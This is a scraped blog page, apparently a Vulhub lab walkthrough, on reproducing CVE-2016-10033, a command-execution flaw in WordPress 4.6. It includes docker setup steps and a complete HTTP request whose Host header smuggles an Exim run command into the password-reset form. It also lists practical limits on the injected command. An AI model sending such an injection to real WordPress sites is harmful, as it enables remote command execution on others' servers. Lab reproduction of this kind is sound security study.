当前位置:网站首页>Vulhub vulnerability recurrence 74_ Wordpress
Vulhub vulnerability recurrence 74_ Wordpress
2022-07-06 00:58:00 【Revenge_ scan】
CVE-2016-10033_Wordpress 4.6 Arbitrary command execution vulnerability (PwnScriptum)
Loophole principle
Reference resources https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
Test environment
shooting range :192.168.4.10_ubuntu
Compile and run the test environment
#docker-compose build
#docker-compose up -d
because Mysql Initialization takes some time , So please wait . After successful operation , visit `http://your-ip:8080/` Open the site , After initializing the administrator user name and password, you can use ( The database has been configured , And will not be automatically updated ).
Test and EXP Use
Send the following packets
```
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login=root
```
so `/tmp/success` Created successfully :
But in practice , There are still some pits to step through . There are several specific pits :
1. The command executed cannot contain a large number of special characters , Such as `:`、 Quotation marks, etc .
2. Commands will be converted to lowercase letters
3. The command requires an absolute path
4. You need to know the user name of an existing user
Exploit
Use msf Reappear
边栏推荐
- C language programming (Chapter 6 functions)
- Construction plan of Zhuhai food physical and chemical testing laboratory
- curlpost-php
- ADS-NPU芯片架构设计的五大挑战
- MYSQL---查询成绩为前5名的学生
- devkit入门
- Mysql--- query the top 5 students
- Leetcode 44 Wildcard matching (2022.02.13)
- After 95, the CV engineer posted the payroll and made up this. It's really fragrant
- GNSS terminology
猜你喜欢
MIT doctoral thesis | robust and reliable intelligent system using neural symbol learning
JVM_ 15_ Concepts related to garbage collection
ubantu 查看cudnn和cuda的版本
Introduction of motor
Comment faire votre propre robot
KDD 2022 | 脑电AI助力癫痫疾病诊断
cf:C. The Third Problem【关于排列这件事】
Cf:h. maximum and [bit operation practice + K operations + maximum and]
Differences between standard library functions and operators
[groovy] compile time meta programming (AST syntax tree conversion with annotations | define annotations and use groovyasttransformationclass to indicate ast conversion interface | ast conversion inte
随机推荐
Questions about database: (5) query the barcode, location and reader number of each book in the inventory table
Cf:c. the third problem
For a deadline, the IT fellow graduated from Tsinghua suddenly died on the toilet
Finding the nearest common ancestor of binary tree by recursion
猿桌派第三季开播在即,打开出海浪潮下的开发者新视野
关于#数据库#的问题:(5)查询库存表中每本书的条码、位置和借阅的读者编号
Spark SQL null value, Nan judgment and processing
[day 30] given an integer n, find the sum of its factors
可恢复保险丝特性测试
In the era of industrial Internet, we will achieve enough development by relying on large industrial categories
Synchronized and reentrantlock
The value of applet containers
MIT doctoral thesis | robust and reliable intelligent system using neural symbol learning
Four dimensional matrix, flip (including mirror image), rotation, world coordinates and local coordinates
Leetcode Fibonacci sequence
Dynamic programming -- linear DP
Distributed base theory
GNSS terminology
ADS-NPU芯片架构设计的五大挑战
Why can't mathematics give machine consciousness